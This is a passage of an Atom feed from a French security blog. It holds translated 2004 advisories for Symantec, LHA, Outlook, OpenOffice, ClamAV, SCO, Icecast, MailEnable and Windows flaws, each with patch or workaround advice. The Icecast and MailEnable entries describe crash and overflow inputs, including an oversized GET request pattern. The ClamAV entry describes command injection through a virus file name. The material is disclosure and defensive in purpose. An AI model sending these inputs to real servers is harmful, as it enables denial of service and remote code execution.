codes arbitraires avec les droits 0 du kernel, mais exige que le traffic NBNS (port 137/udp) soit autorisé.&lt;br /&gt;&lt;br /&gt;4/ Une autre erreur de limite est présente dans le pilote "SYSDNS.SYS" pendant le traitement des datagrammes DNS peut être exploitée pour provoquer un buffer overflow sur la pile à cause d'une réponse DNS particulièrement modifiée contenant un nom canonique excessivement long dans le champs d'enregistrement CNAME.&lt;br /&gt;&lt;br /&gt;L'exploitation réussie permettrait l'éxécution de codes arbitraires avec les droits 0 du kernel.&lt;br /&gt;Cela peut normalement être exploité correctement avec tous les ports filtrés, et toutes les règles d'intrusions activées et ceci est dû a une faille du système.&lt;br /&gt;&lt;br /&gt;NOTE: La vulnérabilité a été jugée très critique car la dernière faille peut être potentiellement un ver.&lt;br /&gt;La faille est très similaire à la faille de "ICQ Response Buffer Overflow" qui est présente dans certains produits ISS, qui ont déjà été exploités par le ver 'WITTY' le jour suivant la mise au grand public de la vulnerabilité.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Télécharger les patchs disponnibles par le soft LiveUpdate ou aller sur les supports techniques.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Barnaby Jack, Karl Lynn et Derek Soeder, eEye Digital Security &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: http://secunia.com/advisories/11066/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108520305979354385?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520305979354385'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108520305979354385'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108520305979354385' title='Symantec Client Firewall Products Multiple Vulnerabilities'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446056254432627</id><published>2004-05-13T17:02:00.000+02:00</published><updated>2004-05-13T17:02:42.546+02:00</updated><title type='text'>Multiple LHA Buffer Overflow/Directory Traversal Vulnerabilities </title><content type='html'>Sujet: Multiple LHA Buffer Overflow/Directory Traversal Vulnerabilities &lt;br /&gt;Versions: Mr. S.K. LHA 1.14 Mr. S.K. LHA 1.15 Mr. S.K. LHA 1.17 RARLAB WinRar 3.20 RedHat lha-1.14i-9.i386.rpm + RedHat Linux 9.0 i386 Stalker CGPMcAfee 3.2 + McAfee Antivirus Engine 4.3.20 WinZip WinZip 9.0 &lt;br /&gt;Auteur: Ulf Harnhammar &lt;br /&gt;Traducteur FR: ThicParasite &lt;br /&gt;Date: 09 mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;LHA est sensible à de multiples vulérabilités qui peuvent permettre à une archive corrompue d'exécuter du code arbitraire ou de corrompre des fichies arbitraires quand cette archive est utilisée.&lt;br /&gt;&lt;br /&gt;Les premières failles sont assignées à CVE candidate identifier (CAN-2004-0234). Il a été rapporté que LHA contient 2 vulanabilités de type buffer overflow au niveau de la pile. Ces vulérabilités peuvent être exploitées pour envoyer des instructions avec les privilèges de l'utilisateur qui invoque l'utilitaire LHA infecté.&lt;br /&gt;Le second volet concernet CVE candidate identifier (CAN-2004-0235). En plus des vulnérabilités de type buffer overflow, LHA est sujet à de sévères failles de répértoire transversaux. Ces répértoires transervaux contiennent des failles qui permettent d'exploiter ou de corrompre des fichiers lors de l'utilisation de l'utiliaire. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Auncun exploit connu à ce jour. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Il a été rapporté que d'utiliser CGPMafee plug-in with d-option peut contourner cette faille.&lt;br /&gt;Les utilisateurs des différents systmès doivent contacter leus revendeurs pour plus de détails. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Ulf Harnhammar &lt;br /&gt;Traducteur FR: ThicParasite &lt;br /&gt;Référence: http://www.securityfocus.com/bid/10243/solution/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446056254432627?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446056254432627'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446056254432627'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446056254432627' title='Multiple LHA Buffer Overflow/Directory Traversal Vulnerabilities '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446053348396525</id><published>2004-05-13T17:01:00.000+02:00</published><updated>2004-05-13T17:02:13.483+02:00</updated><title type='text'>Microsoft Outlook External Reference Vulnerability </title><content type='html'>Sujet: Microsoft Outlook External Reference Vulnerability &lt;br /&gt;Versions: MS Office 2003 toutes éditions et MS Outlook 2003 &lt;br /&gt;Auteur: http-equiv &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 12 mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Il a été rapporté qu'une faille de sécurité dans MS Outlook, permettrait à des personnes mal intentionnées de vérifier si le destinataire d'un email a bien lu le message.&lt;br /&gt;Outlook 2003 est supposé protéger contre le chargement d'objects depuis des sources externes lors de la consultation d'emails. Cependant, il est possible de forcer Outlook à charger des objects XML depuis des serveurs externes. Cela peut-être exploité pour vérifier la validité du destinataire, mais aussi permettre de charger du contenu, qui serait normalement filtré.&lt;br /&gt;Cette faille affecterait Outlook 2003. Les autres versions peuvent aussi être sensibles à cette faille, mais elles ne promettent pas la sécurité que clame Outlook 2003. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit connu à ce jour &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Filtrer les emails au format HTML &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: http-equiv &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://secunia.com/advisories/11595/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446053348396525?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446053348396525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446053348396525'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446053348396525' title='Microsoft Outlook External Reference Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446046546583014</id><published>2004-05-13T17:00:00.001+02:00</published><updated>2004-05-13T17:01:05.466+02:00</updated><title type='text'>Gentoo update for OpenOffice </title><content type='html'>Sujet: Gentoo update for OpenOffice &lt;br /&gt;Versions: non disponible. &lt;br /&gt;Auteur: &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: Parution le 11 Mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Openoffice.org charge des codes depuis la libraire Neon qui présente plusieurs vulnérabilités au niveau du format des chaines de caractères, ce qui autorise une éxécution de codes arbitraires à distance lors d'une connection à un serveur WebDAV incertain. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Si vous utilisez la publication par WebDAV et que vous vous connectez à un serveur WebDAV malveillant, ce serveur peut exploiter ces vulnérabilités pour éxécuter des codes arbitraires avec les droits de l'utilisateur qui utilise Openoffice.org. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Il n'y a pas encore de fichiers patch pour les vulnérabilités, mais il est conseillé pour tous les utlisateurs des paquetages de openoffice-bin et ximian-openoffice-bin qui utilisent les fonctions de publication de WebDAV à upgrader vers les nouvelles versions des paquetages sources.&lt;br /&gt;&lt;br /&gt;Les utilisateurs d'openoffice avec l'architecture x86 doivent taper ceci :&lt;br /&gt;&lt;br /&gt;# emerge sync&lt;br /&gt;# emerge -pv "&gt;=app-office/openoffice-1.1.1-r1"&lt;br /&gt;# emerge "&gt;=app-office/openoffice-1.1.1-r1"&lt;br /&gt;&lt;br /&gt;Les utilisateurs d'openoffice avec l'architecture SPARC doivent taper ceci :&lt;br /&gt;&lt;br /&gt;# emerge sync&lt;br /&gt;# emerge -pv "&gt;=app-office/openoffice-1.1.0-r3"&lt;br /&gt;# emerge "&gt;=app-office/openoffice-1.1.0-r3"&lt;br /&gt;&lt;br /&gt;Les utilisateurs d'openoffice avec l'architecture PPC doivent taper ceci :&lt;br /&gt;&lt;br /&gt;# emerge sync&lt;br /&gt;# emerge -pv "&gt;=app-office/openoffice-1.0.3-r1"&lt;br /&gt;# emerge "&gt;=app-office/openoffice-1.0.3-r1"&lt;br /&gt;&lt;br /&gt;Les utilisateurs d'openoffice-ximian doivent taper ceci :&lt;br /&gt;&lt;br /&gt;# emerge sync&lt;br /&gt;# emerge -pv "&gt;=app-office/openoffice-ximian-1.1.51-r1"&lt;br /&gt;# emerge "&gt;=app-office/openoffice-ximian-1.1.51-r1" &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: http://article.gmane.org/gmane.linux.gentoo.announce/332 &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446046546583014?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446046546583014'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446046546583014'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446046546583014' title='Gentoo update for OpenOffice '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446043208738934</id><published>2004-05-13T17:00:00.000+02:00</published><updated>2004-05-13T17:00:32.086+02:00</updated><title type='text'>Gentoo update for ClamAV </title><content type='html'>Sujet: Gentoo update for ClamAV &lt;br /&gt;Versions: net-mail/clamav version &lt; 0.70 &lt;br /&gt;Auteur: &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: Parution le 11 Mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Clam Antivirus est vulnérable si dans votre configuration (clamav.conf) vous utilisez le paramètre '%f' pour VirusEvent, ce qui autoriserait à l'attaquant de pouvoir éxécuter des commandes système arbitraires et ainsi bénéficier d'une ascension de privilèges. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;En envoyant un virus avec un nom malicieux cela peut en résulter à l'éxécution arbitraire de commandes système avec les droits dont est lancé l'antivirus.&lt;br /&gt;Souvent clamav est associé à des serveurs mails pour scanner les emails, donc cette attaque peut-être menée à distance. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Vous ne devez pas utiliser le paramètre '%f' pour VirusEvent dans votre fichier de configuration clamav.conf et vous devez faire une mise à jour pour gentoo :&lt;br /&gt;&lt;br /&gt;emerge sync&lt;br /&gt;emerge -pv "&gt;=net-mail/clamav-0.70"&lt;br /&gt;emerge "&gt;=net-mail/clamav-0.70"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: http://article.gmane.org/gmane.linux.gentoo.announce/331 &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446043208738934?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446043208738934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446043208738934'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446043208738934' title='Gentoo update for ClamAV '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446040043483800</id><published>2004-05-13T16:59:00.001+02:00</published><updated>2004-05-13T17:00:00.433+02:00</updated><title type='text'>SCO OpenServer Insecure Default XHost Access Controls </title><content type='html'>Sujet: SCO OpenServer Insecure Default XHost Access Controls &lt;br /&gt;Versions: OpenServer 5.0.5, 5.0.6, 5.0.7 &lt;br /&gt;Auteur: KF &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: Parution le 07 Avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Sco a laissé un ancien problème de sécurité, qui peut-être exploité malicieusement, par des utilisateurs locaux qui pourrait ainsi beneficier d'une ascension de privilèges.&lt;br /&gt;Le problème serait dû à une insécurité dans le contrôle des accès aux xhosts.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit à ce jour. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Installer les derniers paquetages et d'activer Xauthority.&lt;br /&gt;ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: KF &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446040043483800?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446040043483800'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446040043483800'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446040043483800' title='SCO OpenServer Insecure Default XHost Access Controls '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446037127076019</id><published>2004-05-13T16:59:00.000+02:00</published><updated>2004-05-13T16:59:31.270+02:00</updated><title type='text'>SCO OpenServer Insecure Default XHost Access Controls </title><content type='html'>Sujet: SCO OpenServer Insecure Default XHost Access Controls &lt;br /&gt;Versions: OpenServer 5.0.5, 5.0.6, 5.0.7 &lt;br /&gt;Auteur: KF &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: Parution le 07 Avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Sco a laissé un ancien problème de sécurité, qui peut-être exploité malicieusement, par des utilisateurs locaux qui pourrait ainsi beneficier d'une ascension de privilèges.&lt;br /&gt;Le problème serait dû à une insécurité dans le contrôle des accès aux xhosts.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit à ce jour. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Installer les derniers paquetages et d'activer Xauthority.&lt;br /&gt;ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: KF &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446037127076019?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446037127076019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446037127076019'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446037127076019' title='SCO OpenServer Insecure Default XHost Access Controls '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446034565488217</id><published>2004-05-13T16:58:00.000+02:00</published><updated>2004-05-13T16:59:05.653+02:00</updated><title type='text'>Icecast Basic Authorization Denial of Service Vulnerability </title><content type='html'>Sujet: Icecast Basic Authorization Denial of Service Vulnerability &lt;br /&gt;Versions: 2.0.0 pour Windows, mais d'autres versions peuvent être faillibles. &lt;br /&gt;Auteur: ned &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: parution le 12 Mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;ned a découvert une faille dans Icecast qui peut-être exploitée pour provoquer un Deni de service.&lt;br /&gt;La faille est due à un éxédant de messages d'erreur dans l'interface web pendant le traitement des requêtes de 'Basic Authorization'. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;On peut l'exploiter pour crasher l'application en passant une longue chaine de caractères ( environ 3000 bytes ) dans l'entête "Authorization:". &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Filtrer l'accès au service ( qui écoute par défaut sur le port 8000/tcp ) avec un firewall ou dans un serveur proxy.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: ned &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: http://secunia.com/advisories/11578/ &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446034565488217?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446034565488217'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446034565488217'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446034565488217' title='Icecast Basic Authorization Denial of Service Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446028987488722</id><published>2004-05-13T16:57:00.001+02:00</published><updated>2004-05-13T16:58:09.873+02:00</updated><title type='text'>Remote Heap overflow Vulnerability in MAilEnable </title><content type='html'>Sujet: Remote Heap overflow Vulnerability in MAilEnable &lt;br /&gt;Versions: MailEnable Professional Edition v1.5 up to v1.7 &lt;br /&gt;Auteur: Behrang Fouladi (behrang@hat-squad.com) &amp;&amp; Pejman Davarzani (pejman@hat-squad.com) &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: 09 Mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;La version professionnelle de MailEnable possède un service mail supplémentaire appelé HTTPMail.&lt;br /&gt;HTTPMail est un protocole mail basé sur WEBDAV ce qui nous permet d'accéder à nos emails à partir du serveur sans les télécharger (ce qui n'est pas le cas avec POP).&lt;br /&gt;Ce service (MEHTTPS) écoute par défaut sur le port 8080/tcp. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Il suffit d'envoyer une requête HTTP avec plus de 4045 bytes de long sur le service MEHTTPS, ce qui provoquera un tas de buffer overflow pendant l'authentification (si activée) et il est possible pour un attaquant distant d'éxécuter un code dans le systeme, ou juste crasher le service.&lt;br /&gt;Si l'authentification est désactivée il faut une requête HTTP de plus de 8500 bytes pour provoquer le buffer overflow.&lt;br /&gt;&lt;br /&gt;Exemples:&lt;br /&gt;1/ authentification activée : GET /&lt;4032xA&gt; HTTP/1.1&lt;br /&gt;2/ authentification désactivée : &lt;8501xA&gt;&lt;br /&gt;&lt;br /&gt;Résultat, les adresses EAX et ECX seront redéfinies. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;MailEnable a sorti un patch pour ce problème : http://mailenable.com/hotfix/ &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Behrang Fouladi (behrang@hat-squad.com) &amp;&amp; Pejman Davarzani (pejman@hat-squad.com) &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Référence: http://www.hat-squad.com/en/000071.html &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108446028987488722?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446028987488722'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108446028987488722'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108446028987488722' title='Remote Heap overflow Vulnerability in MAilEnable '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108446025899732942</id><published>2004-05-13T16:57:00.000+02:00</published><updated>2004-05-13T16:57:38.996+02:00</updated><title type='text'>Vulnerability in Help and Support Center Could Allow Remote Code Execution </title><content type='html'>Sujet: Vulnerability in Help and Support Center Could Allow Remote Code Execution &lt;br /&gt;Versions: liste des OS faillibles disponnible ici -&gt; http://www.microsoft.com/technet/security/bulletin/MS04-015.mspx &lt;br /&gt;Auteur: &lt;br /&gt;Traducteur FR: le_rasta &lt;br /&gt;Date: 11 Mai 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |